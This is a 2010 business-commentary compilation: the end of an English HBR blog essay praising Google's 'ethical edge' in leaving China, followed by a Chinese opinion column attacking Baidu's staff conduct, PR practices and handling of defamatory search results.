It's an ethical edge (no, not ethical perfection) that's always been at the heart of Google's disruptive success. Compromising its ethical edge cost Google in all the ways above, damaging its brand, diluting its purpose, causing internal strife, creating thinner value. Most damaging, compromising its ethical edge cost left Google trapped in an impossible, vicious cycle of competitive dynamics: to "compete," should it do the government's bidding even more than quasi-state-sponsored champions, like Baidu?

Wall Street, in typically myopic fashion, thinks Google's crazy — who doesn't want to make a buck? But the Street gets real economics less than my pet hamster does. Not every marginal dollar is created equal. The benefits from the effects above steeply outweigh the pennies Google was earning. Instead, a Google that doesn't play by China's rules is a better business, which creates more thicker, sustainable, meaningful value. And, increasingly, it's thick value that the smart money rewards — and reaps lasting rewards from. No wonder, then, that Wall Street legend Jim Chanos is betting against China's unsustainable, artificial growth.

An ethical edge just might be the ultimate cause of advantage. It's how better distribution, production, marketing, and pricing — all just proximate causes of advantage — ultimately happen. Jim Chanos's investment thesis says: without an ethical edge, new value cannot be created — old value can only be shuffled around (hi, Wall Street).

Ethical edge is advantage reconceived for the 21st century. It's an institutional innovation: the institution of "advantage" rebuilt for a threadbare, fraying, global economy. It's a radical new definition of "advantage" that blows past the stale, tired idea of competitive advantage.

It's time for a great reboot. Today's great challenge isn't blindly building countries, companies, or households on a broken set of institutions. It is reimagining new institutions for a hyperconnected world. Answering that challenge begins, from my tiny perspective, with an ethical edge as the cornerstone of every kind of organization. Seeking an ethical edge is the truest test of a Constructive Capitalist. Google just passed it. China — like Dubai, Russia, and yesterday's mega-corporations — is failing it spectacularly.

So here's the single question everyone should be asking. The old high ground is the new low ground. Yesterday's mountain is today's valley. Are you ascending to the new high ground?

Fire away in the comments with questions, thoughts, or examples.
 

http://blogs.hbr.org/haque/2010/01/google_china_and_the_new_high.html

“幸福来得太快。”在谷歌尚未明确是否就此退出中国市场之际，百度员工已经赤??地趁火打劫：如今百度负责广告销售的员工一早来到公司后的第一件事，就是列出谷歌的广告客户名单，开始逐个联系，百度人得意的说，“我们内部调侃这是捡钱计划。”差不多同时，百度首席产品设计师孙云丰在博客上公开撰文辱骂：（关于谷歌退出中国）“整个事情给我的唯一感受，就是恶心”、“证明google是个市侩分子。”

姑且不论孙云丰的观点是非对错，如果孙云丰代表百度骂谷歌，那他就严重地缺乏职业道德，辱骂竞争对手显然不是一家公众上市公司高管之所为能事；如果孙云丰代表自己骂谷歌公司，那么就有义务接受谷歌用户的回应和批评。可惜的是孙云丰一方面宣称自己观点毫无错误，另一方面，他又赶紧删掉了自己的文章并且四处要求删贴。也有人说删贴未必是他自己的意愿。那么，作为宣称“有道德感”的百度员工，孙云丰不应该屈从别人的意见删掉自己认为正确的东西。作为百度高管，孙云丰更不应该允许百度公关去打电话要求别人删贴。

新浪微博上有网友评论说，“单从商业价值和经济利益方面考量，都可以看出Google的不作恶，并不是作秀的口号。对于一个靠信息有序化赚钱的公司，必须要不作恶才行。百度正好相反，必须要作恶才行。”这句话说到点子上，谷歌退就退吧，百度未必就能继续一股独大。即使暂时抢下更大份额，如果不改变或者提升哪怕是一个世侩也该有的道德底气，百度终有一天遭世人唾弃。

当然，曾经我也经常使用百度，享受其便利搜索的同时也关注其成长。我曾一直很期待百度能成为一家负有责任感的道德公司，就像他们新编《壹百度》里所鼓吹的那样。遗憾的是，从百度高管到员工，似乎都没和这家公司一样完成这种道德上的转变。不要武断地以为我是在挟公器而泄私愤。以我跑IT线的最近两年跟百度人打交道的直观感受就是，百度严重地缺乏公关沟通原则并且势利：为了掩盖其负面新闻，百度公关可以不惜千里飞来又是许诺又是找高层拉关系；一旦目的达到或者遭拒，其公关团队转瞬就变得傲慢十足。

从最近频频曝出网友投诉百度上充斥恶意诽谤攻击他人名誉的网页链接可见一斑。百度不仅没有履行道德公司所必须的制止不良信息散播责任，却是为了暖味眼球和暴利空间，选择最大限度地纵容和助长这类恶意传播扩大化，给被侵权人带来更大的伤害。可悲的是，百度不以为耻反以为荣，似有将此恶习死扛到底的趋势。

“百度搜索引擎的核心价值就在于在网络空间里自由地抓取信息，靠信息有序化进行商业运作。”百度公关高管们不止一次地辩称，技术上无法屏蔽掉恶意诽谤信息。但如果以此逃避散播诽谤网贴的责任，那么，累积起百度巨大财富将李彦宏推上首富的百度竞价排名又作何解？那些活跃在百度线上线下，以收钱删贴的公司又是如何的生存？更近的例子是，如今百度上搜索孙云丰骂谷歌的贴子，缘何毫无例外地全部显示“页面无法访问”？百度何必如此掩耳盗铃。

百度原本可以更幸福的，他完全可以把商业价值建立在一个正确的价值观之上。谷歌的退出，无疑让百度迎来商业搜索史上可遇不可求的机遇，很不幸，百度根本不愿这么做。

作者:戴远程